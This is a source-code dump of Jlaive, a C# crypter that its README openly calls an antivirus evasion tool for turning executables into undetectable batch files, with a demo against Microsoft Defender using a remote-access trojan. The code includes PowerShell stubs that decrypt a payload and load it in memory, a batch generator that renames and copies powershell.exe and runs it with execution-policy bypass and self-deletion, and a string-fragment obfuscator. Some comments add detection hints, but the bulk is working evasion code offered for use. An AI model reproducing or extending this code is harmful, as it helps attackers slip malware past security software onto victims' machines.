├── version ├── Jlaive ├── Resources │ ├── runpe.dll │ ├── apiunhooker.dll │ ├── XORStub.ps1 │ ├── AESStub.ps1 │ └── Stub.cs ├── FodyWeavers.xml ├── App.config ├── Properties │ ├── Settings.settings │ ├── Settings.Designer.cs │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ └── Resources.resx ├── Misc │ ├── Settings.cs │ └── Utils.cs ├── Program.cs ├── CodeGen │ ├── FileGen.cs │ └── StubGen.cs ├── CodeMod │ ├── Obfuscator.cs │ └── Patcher.cs ├── packages.config ├── Form1.resx ├── FodyWeavers.xsd ├── Form1.cs ├── Jlaive.csproj └── Form1.Designer.cs ├── LICENSE ├── Jlaive.sln └── README.md /version: -------------------------------------------------------------------------------- 1 | v1.2.2 2 | -------------------------------------------------------------------------------- /Jlaive/Resources/runpe.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/Jlaive/HEAD/Jlaive/Resources/runpe.dll -------------------------------------------------------------------------------- /Jlaive/Resources/apiunhooker.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/Jlaive/HEAD/Jlaive/Resources/apiunhooker.dll -------------------------------------------------------------------------------- /Jlaive/FodyWeavers.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Jlaive/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Jlaive/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- 
/Jlaive/Resources/XORStub.ps1: -------------------------------------------------------------------------------- 1 | $contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine); 2 | $lastline_var = $contents_var[$contents_var.Length - 1]; 3 | $payload_var = [System.Convert]::FromBase64String($lastline_var); 4 | $key_var = [System.Convert]::FromBase64String('DECRYPTION_KEY'); 5 | for ($i = 0; $i -le $payload_var.Length; $i++) { $payload_var[$i] = ($payload_var[$i] -bxor $key_var[$i % $key_var.Length]); }; 6 | $msi_var = New-Object System.IO.MemoryStream(, $payload_var); 7 | $mso_var = New-Object System.IO.MemoryStream; 8 | $gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress); 9 | $gs_var.CopyTo($mso_var); 10 | $gs_var.Dispose(); 11 | $msi_var.Dispose(); 12 | $mso_var.Dispose(); 13 | $payload_var = $mso_var.ToArray(); 14 | [System.Reflection.Assembly]::Load($payload_var).EntryPoint.Invoke($null, (, [string[]] ('%*'))) -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 chash 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Jlaive/Misc/Settings.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using Newtonsoft.Json; 4 | 5 | namespace Jlaive 6 | { 7 | public class Settings 8 | { 9 | private static string savepath = AppDomain.CurrentDomain.BaseDirectory + "\\bin\\settings.json"; 10 | 11 | public static SettingsObject Load() 12 | { 13 | if (File.Exists(savepath)) 14 | { 15 | return JsonConvert.DeserializeObject(File.ReadAllText(savepath)); 16 | } 17 | return null; 18 | } 19 | 20 | public static void Save(SettingsObject obj) => File.WriteAllText(savepath, JsonConvert.SerializeObject(obj, Formatting.Indented)); 21 | } 22 | 23 | public class SettingsObject 24 | { 25 | public string inputFile { get; set; } 26 | public bool antiDebug { get; set; } 27 | public bool antiVM { get; set; } 28 | public bool selfDelete { get; set; } 29 | public bool hidden { get; set; } 30 | public bool aes { get; set; } 31 | public bool xor { get; set; } 32 | public string[] bindedFiles { get; set; } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /Jlaive.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.2.32516.85 5 | MinimumVisualStudioVersion = 
10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Jlaive", "Jlaive\Jlaive.csproj", "{D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {C6803204-4415-411E-8D02-0D633E212A8A} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Jlaive/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 
8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Jlaive.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Jlaive/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | using System.Windows.Forms; 6 | 7 | namespace Jlaive 8 | { 9 | internal static class Program 10 | { 11 | [DllImport("user32.dll")] 12 | private static extern bool SetProcessDPIAware(); 13 | 14 | [STAThread] 15 | static void Main() 16 | { 17 | string path = Process.GetCurrentProcess().MainModule.FileName; 18 | if (path.IndexOf(Path.GetTempPath(), StringComparison.OrdinalIgnoreCase) == 0) 19 | { 20 | MessageBox.Show("Jlaive cannot be run from a ZIP file! 
Please extract before running.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 21 | Environment.Exit(1); 22 | } 23 | if (!Directory.Exists(AppDomain.CurrentDomain.BaseDirectory + "\\bin")) Directory.CreateDirectory(AppDomain.CurrentDomain.BaseDirectory + "\\bin"); 24 | SetProcessDPIAware(); 25 | Application.EnableVisualStyles(); 26 | Application.SetCompatibleTextRenderingDefault(false); 27 | Application.Run(new Form1()); 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Jlaive/Resources/AESStub.ps1: -------------------------------------------------------------------------------- 1 | $contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine); 2 | $lastline_var = $contents_var[$contents_var.Length - 1]; 3 | $payload_var = [System.Convert]::FromBase64String($lastline_var); 4 | $aes_var = New-Object System.Security.Cryptography.AesManaged; 5 | $aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC; 6 | $aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; 7 | $aes_var.Key = [System.Convert]::FromBase64String('DECRYPTION_KEY'); 8 | $aes_var.IV = [System.Convert]::FromBase64String('DECRYPTION_IV'); 9 | $decryptor_var = $aes_var.CreateDecryptor(); 10 | $payload_var = $decryptor_var.TransformFinalBlock($payload_var, 0, $payload_var.Length); 11 | $decryptor_var.Dispose(); 12 | $aes_var.Dispose(); 13 | $msi_var = New-Object System.IO.MemoryStream(, $payload_var); 14 | $mso_var = New-Object System.IO.MemoryStream; 15 | $gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress); 16 | $gs_var.CopyTo($mso_var); 17 | $gs_var.Dispose(); 18 | $msi_var.Dispose(); 19 | $mso_var.Dispose(); 20 | $payload_var = $mso_var.ToArray(); 21 | [System.Reflection.Assembly]::Load($payload_var).EntryPoint.Invoke($null, (, [string[]] ('%*'))) -------------------------------------------------------------------------------- 
/Jlaive/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Jlaive")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Jlaive")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d6bba820-e9f7-4da3-a7d2-90a73871c0da")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Jlaive/CodeGen/FileGen.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | 4 | namespace Jlaive 5 | { 6 | /* Generates the text of the batch-file wrapper that this builder emits. */ public class FileGen 7 | { 8 | /* Builds and returns the batch script text. key, iv, mode and rng are forwarded to StubGen.CreatePS to produce the PowerShell command; hidden adds "-windowstyle hidden" to the PowerShell arguments; selfdelete appends a line that deletes the running script ("%~f0"). The copy source, "cd %~dp0", the PowerShell switches and the PowerShell command are passed through Obfuscator.GenCodeBat (Item1, the set statements, is written first; Item2, the variable expansions, forms the command line). The copy destination "%~dp0%~nx0.exe", the "%~nx0.exe" invocation prefix, "@echo off", "cls", the self-delete line and "exit /b" are written as plain text, so those strings are the same in every script this method returns. Defender-relevant artifacts visible here: (1) powershell.exe is copied from its System32 path to a file named <script name>.exe in the script's own directory, so matching on the image name "powershell.exe" will not see it, while a plain copy leaves the file's hash and version-resource metadata unchanged; (2) that copy is started with "-noprofile", optionally "-windowstyle hidden", "-executionpolicy bypass" and "-command"; (3) the optional self-delete removes the script after launch. The encrypted payload is not appended in this method. */ public static string CreateBat(byte[] key, byte[] iv, 
EncryptionMode mode, bool hidden, bool selfdelete, Random rng) 9 | { 10 | string command = StubGen.CreatePS(key, iv, mode, rng); 11 | StringBuilder output = new StringBuilder(); 12 | output.AppendLine("@echo off"); 13 | 14 | /* level 4: the copy command is cut into short fragments */ (string, string) obfuscated = Obfuscator.GenCodeBat(@"copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", rng, 4); 15 | output.AppendLine(obfuscated.Item1); 16 | output.AppendLine(obfuscated.Item2 + " \"%~dp0%~nx0.exe\" /y"); 17 | 18 | output.AppendLine("cls"); 19 | obfuscated = Obfuscator.GenCodeBat("cd %~dp0", rng, 4); 20 | output.AppendLine(obfuscated.Item1); 21 | output.AppendLine(obfuscated.Item2); 22 | 23 | string commandstart = $"-noprofile {(hidden ? "-windowstyle hidden" : string.Empty)} -executionpolicy bypass -command "; 24 | obfuscated = Obfuscator.GenCodeBat(commandstart, rng, 2); 25 | output.AppendLine(obfuscated.Item1); 26 | (string, string) obfuscated2 = Obfuscator.GenCodeBat(command, rng, 2); 27 | output.AppendLine(obfuscated2.Item1); 28 | /* runs the copied PowerShell binary by its new name with the switches and the command */ output.AppendLine("\"%~nx0.exe\" " + obfuscated.Item2 + obfuscated2.Item2); 29 | 30 | if (selfdelete) output.AppendLine("(goto) 2>nul & del \"%~f0\""); 31 | output.AppendLine("exit /b"); 32 | return output.ToString(); 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Jlaive 2 | 3 | Jlaive is an antivirus evasion tool that can convert executables into undetectable batch files. Obfuscated .NET assemblies are not guaranteed to work. 4 | 5 | Join the Discord server for discussion and enquiries: https://discord.gg/Qzyq3Dqn82. 
6 | 7 | ![image](https://media.discordapp.net/attachments/959762900443070485/987900379863846962/Untitled.png) 8 | 9 | ## Features 10 | - .NET/Native (x64) support 11 | - AES/XOR encryption 12 | - Compression 13 | - Anti Debug 14 | - Anti VM 15 | - Melt file (self delete) 16 | - Bind files 17 | - AMSI bypass 18 | - ETW bypass 19 | - API unhooking 20 | 21 | ## Screenshots 22 | 23 | ![image](https://media.discordapp.net/attachments/961905736139554876/982925324071338014/unknown.png) 24 | ![image](https://media.discordapp.net/attachments/961905736139554876/982925618377281536/unknown.png) 25 | 26 | Demo video with [AsyncRat](https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp) vs Microsoft Defender: https://vimeo.com/717794371 27 | 28 | ## Donate 29 | XMR: 47sQ8jVWGtb8iA5zJnnHmfFmu8GwibMs94JbhtutW9HNeYx9UAxWUNNF3NfE79pGm8bCBCFaF3R6CQEYADoF5Uv38m25SNt 30 | 31 | ## Known issues 32 | 33 | - `Hidden` option does not work on Windows Terminal. 34 | - Not compatible with Python EXEs. 35 | 36 | ## To-do 37 | 38 | - Fix XOR encryption 39 | - Implement new GUI 40 | 41 | ## Credits 42 | 43 | C# RunPE: [https://github.com/nettitude/RunPE](https://github.com/nettitude/RunPE) 44 | 45 | SharpUnhooker: [https://github.com/GetRektBoy724/SharpUnhooker](https://github.com/GetRektBoy724/SharpUnhooker) 46 | 47 | ## Disclaimer 48 | This project was made for educational purposes only. I am not responsible if you choose to use this illegally/maliciously. 
49 | -------------------------------------------------------------------------------- /Jlaive/CodeMod/Obfuscator.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | 5 | using static Jlaive.Utils; 6 | 7 | namespace Jlaive 8 | { 9 | public class Obfuscator 10 | { 11 | /* Splits batch text into fragments, stores each fragment in a randomly named environment variable and returns a pair: Item1 is the text of the "set" statements, Item2 is the original text rewritten as consecutive %name% expansions (one output line per input line). input: batch text, split on Environment.NewLine. rng: source of the names, the shuffle order and the separators. level: controls the minimum fragment length, which is (5 - level) times 2 when level is greater than 1 and 10 otherwise; the levels 4 and 2 used by FileGen.CreateBat give 2 and 6, and the default 5 gives 0, which cuts before every character outside a variable reference. A '%' toggles the invar flag and a space clears it; fragments are only cut while the flag is clear. Shape of the output, useful for triage: many set "<10-character RandomString name>=<fragment>" statements in shuffled order, separated at random by a newline or " & ", followed by lines made only of %name% references. cmd.exe expands those references before it starts a child process, so process-creation telemetry for the child carries the reassembled command line even though the script on disk does not. */ public static (string, string) GenCodeBat(string input, Random rng, int level = 5) 12 | { 13 | string ret = string.Empty; 14 | string[] lines = input.Split(new string[] { Environment.NewLine }, StringSplitOptions.None); 15 | 16 | int amount = 5; 17 | if (level > 1) amount -= level; 18 | amount *= 2; 19 | 20 | /* NOTE(review): the generic type arguments of these List declarations appear to have been lost in this listing - confirm against the repository */ List setlines = new List(); 21 | List linevars = new List(); 22 | foreach (string line in lines) 23 | { 24 | List splitted = new List(); 25 | string sc = string.Empty; 26 | bool invar = false; 27 | foreach (char c in line) 28 | { 29 | if (c == '%') 30 | { 31 | invar = !invar; 32 | sc += c; 33 | continue; 34 | } 35 | if (c == ' ' && invar) 36 | { 37 | invar = false; 38 | sc += c; 39 | continue; 40 | } 41 | if (!invar && sc.Length >= amount) 42 | { 43 | splitted.Add(sc); 44 | invar = false; 45 | sc = string.Empty; 46 | } 47 | sc += c; 48 | } 49 | splitted.Add(sc); 50 | 51 | List vars = new List(); 52 | foreach (string s in splitted) 53 | { 54 | string name = RandomString(10, rng); 55 | setlines.Add($"set \"{name}={s}\""); 56 | vars.Add(name); 57 | } 58 | linevars.Add(vars.ToArray()); 59 | } 60 | 61 | /* shuffle: the definitions no longer appear in the order in which they are used */ setlines = new List(setlines.OrderBy(x => rng.Next())); 62 | for (int i = 0; i < setlines.Count; i++) 63 | { 64 | ret += setlines[i]; 65 | int r = rng.Next(0, 2); 66 | if (r == 0 || i == setlines.Count - 1) ret += Environment.NewLine; 67 | else ret += " & "; 68 | } 69 | 70 | string varcalls = string.Empty; 71 | foreach (string[] line in linevars) 72 | { 73 | foreach (string s in line) varcalls += $"%{s}%"; 74 | varcalls += Environment.NewLine; 75 | } 76 | return (ret.TrimEnd('\r', '\n'), 
varcalls.TrimEnd('\r', '\n')); 77 | } 78 | } 79 | } -------------------------------------------------------------------------------- /Jlaive/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Jlaive.Properties 12 | { 13 | 14 | 15 | /// 16 | /// A strongly-typed resource class, for looking up localized strings, etc. 17 | /// 18 | // This class was auto-generated by the StronglyTypedResourceBuilder 19 | // class via a tool like ResGen or Visual Studio. 20 | // To add or remove a member, edit your .ResX file then rerun ResGen 21 | // with the /str option, or rebuild your VS project. 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources 26 | { 27 | 28 | private static global::System.Resources.ResourceManager resourceMan; 29 | 30 | private static global::System.Globalization.CultureInfo resourceCulture; 31 | 32 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 33 | internal Resources() 34 | { 35 | } 36 | 37 | /// 38 | /// Returns the cached ResourceManager instance used by this class. 
39 | /// 40 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 41 | internal static global::System.Resources.ResourceManager ResourceManager 42 | { 43 | get 44 | { 45 | if ((resourceMan == null)) 46 | { 47 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Jlaive.Properties.Resources", typeof(Resources).Assembly); 48 | resourceMan = temp; 49 | } 50 | return resourceMan; 51 | } 52 | } 53 | 54 | /// 55 | /// Overrides the current thread's CurrentUICulture property for all 56 | /// resource lookups using this strongly typed resource class. 57 | /// 58 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 59 | internal static global::System.Globalization.CultureInfo Culture 60 | { 61 | get 62 | { 63 | return resourceCulture; 64 | } 65 | set 66 | { 67 | resourceCulture = value; 68 | } 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /Jlaive/CodeMod/Patcher.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Reflection; 6 | 7 | using dnlib.DotNet; 8 | using dnlib.DotNet.Emit; 9 | 10 | namespace Jlaive 11 | { 12 | public class Patcher 13 | { 14 | /* Rewrites a .NET module with dnlib and returns the modified module bytes. For every method body outside the global module type: after a call to ProcessModule::get_FileName() or Assembly::get_Location() it inserts ldstr ".bat.exe", ldstr ".bat" and a callvirt to a string.Replace overload, so the returned path has ".bat.exe" replaced by ".bat"; a call to Assembly::GetEntryAssembly() is replaced by a call to Assembly.GetExecutingAssembly(). Call sites are found by substring match on the instruction's ToString() text. Presumably this keeps the payload's self-path lookups pointing at the batch file rather than at the host executable, whose name ends in ".bat.exe" when the script is a .bat (see "%~nx0.exe" in FileGen.CreateBat) - confirm against the caller. For analysts: an ldstr ".bat.exe", ldstr ".bat", String.Replace sequence directly after these property calls in a recovered assembly is a static trace of this rewrite. */ public static byte[] Fix(byte[] input) 15 | { 16 | ModuleDef module = ModuleDefMD.Load(input); 17 | foreach (TypeDef type in module.GetTypes()) 18 | { 19 | if (type.IsGlobalModuleType) continue; 20 | foreach (MethodDef method in type.Methods) 21 | { 22 | if (!method.HasBody) continue; 23 | IList instr = method.Body.Instructions; 24 | for (var i = 0; i < instr.Count; i++) 25 | { 26 | if (instr[i].ToString().Contains("System.Diagnostics.ProcessModule::get_FileName()")) 27 | { 28 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe")); 29 | 
instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat")); 30 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1)))); 31 | } 32 | else if (instr[i].ToString().Contains("System.Reflection.Assembly::get_Location()")) 33 | { 34 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe")); 35 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat")); 36 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1)))); 37 | } 38 | else if (instr[i].ToString().Contains("System.Reflection.Assembly::GetEntryAssembly()")) 39 | { 40 | instr[i] = OpCodes.Call.ToInstruction(method.Module.Import(GetSystemMethod(typeof(Assembly), "GetExecutingAssembly"))); 41 | } 42 | } 43 | method.Body.SimplifyBranches(); 44 | } 45 | } 46 | MemoryStream ms = new MemoryStream(); 47 | module.Write(ms); 48 | byte[] output = ms.ToArray(); 49 | ms.Dispose(); 50 | return output; 51 | } 52 | 53 | /* Loads with dnlib the module file that defines type, collects every method called name on types whose Name equals type.Name, and returns the entry at position idx (default 0), or null when none matched. Which overload a given idx selects depends on the metadata order of that runtime module. */ private static MethodDef GetSystemMethod(Type type, string name, int idx = 0) 54 | { 55 | string filename = type.Module.FullyQualifiedName; 56 | ModuleDefMD module = ModuleDefMD.Load(filename); 57 | TypeDef[] types = module.GetTypes().ToArray(); 58 | List methods = new List(); 59 | foreach (TypeDef t in types) 60 | { 61 | if (t.Name != type.Name) continue; 62 | foreach (var m in t.Methods) 63 | { 64 | 65 | if (m.Name != name) continue; 66 | methods.Add(m); 67 | } 68 | } 69 | if (methods.Count > 0) return methods[idx]; 70 | return null; 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /Jlaive/Misc/Utils.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.IO.Compression; 4 | using System.Linq; 5 | using System.Reflection; 6 | using System.Security.Cryptography; 7 | 8 | namespace Jlaive 9 | { 10 | public enum EncryptionMode 11 | { 12 | AES, 
13 | XOR 14 | } 15 | 16 | public class Utils 17 | { 18 | /* Returns the bytes of the manifest resource called name from the executing assembly. There is no null check: GetManifestResourceStream returns null for an unknown name, and the CopyTo call then throws. */ public static byte[] GetEmbeddedResource(string name) 19 | { 20 | Assembly asm = Assembly.GetExecutingAssembly(); 21 | MemoryStream ms = new MemoryStream(); 22 | Stream stream = asm.GetManifestResourceStream(name); 23 | stream.CopyTo(ms); 24 | stream.Dispose(); 25 | byte[] ret = ms.ToArray(); 26 | ms.Dispose(); 27 | return ret; 28 | } 29 | 30 | /* Returns the manifest resource called name from the executing assembly, read to the end as text through a StreamReader. */ public static string GetEmbeddedString(string name) 31 | { 32 | Assembly asm = Assembly.GetExecutingAssembly(); 33 | StreamReader stream = new StreamReader(asm.GetManifestResourceStream(name)); 34 | string ret = stream.ReadToEnd(); 35 | stream.Close(); 36 | stream.Dispose(); 37 | return ret; 38 | } 39 | 40 | /* Encrypts input with the selected mode and returns the result. AES: AesManaged in CBC mode with PKCS7 padding, using the supplied key and iv. XOR: each byte is XORed with key[i % key.Length]; the input array itself is overwritten and returned, and iv is ignored. Returns null for any other EncryptionMode value. */ public static byte[] Encrypt(EncryptionMode type, byte[] input, byte[] key, byte[] iv) 41 | { 42 | switch (type) 43 | { 44 | case EncryptionMode.AES: 45 | { 46 | AesManaged aes = new AesManaged(); 47 | aes.Mode = CipherMode.CBC; 48 | aes.Padding = PaddingMode.PKCS7; 49 | ICryptoTransform encryptor = aes.CreateEncryptor(key, iv); 50 | byte[] encrypted = encryptor.TransformFinalBlock(input, 0, input.Length); 51 | encryptor.Dispose(); 52 | aes.Dispose(); 53 | return encrypted; 54 | } 55 | case EncryptionMode.XOR: 56 | { 57 | for (int i = 0; i < input.Length; i++) 58 | { 59 | input[i] = (byte)(input[i] ^ key[i % key.Length]); 60 | } 61 | return input; 62 | } 63 | } 64 | return null; 65 | } 66 | 67 | /* Returns the GZip-compressed form of bytes. The GZipStream is disposed before ToArray() is called so that the final block is flushed into mso; MemoryStream.ToArray() remains usable after Dispose. */ public static byte[] Compress(byte[] bytes) 68 | { 69 | MemoryStream msi = new MemoryStream(bytes); 70 | MemoryStream mso = new MemoryStream(); 71 | GZipStream gs = new GZipStream(mso, CompressionMode.Compress); 72 | msi.CopyTo(gs); 73 | gs.Dispose(); 74 | mso.Dispose(); 75 | msi.Dispose(); 76 | return mso.ToArray(); 77 | } 78 | 79 | public static string RandomString(int length, Random rng) 80 | { 81 | string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 82 | return new string(Enumerable.Repeat(chars, length).Select(s => s[rng.Next(s.Length)]).ToArray()); 
83 | } 84 | 85 | public static bool IsAssembly(string path) 86 | { 87 | try 88 | { 89 | AssemblyName.GetAssemblyName(path); 90 | return true; 91 | } 92 | catch 93 | { 94 | return false; 95 | } 96 | } 97 | } 98 | } 99 | -------------------------------------------------------------------------------- /Jlaive/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /Jlaive/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | text/microsoft-resx 107 | 108 | 109 | 2.0 110 | 111 | 112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 113 | 114 | 115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | -------------------------------------------------------------------------------- /Jlaive/Form1.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, 
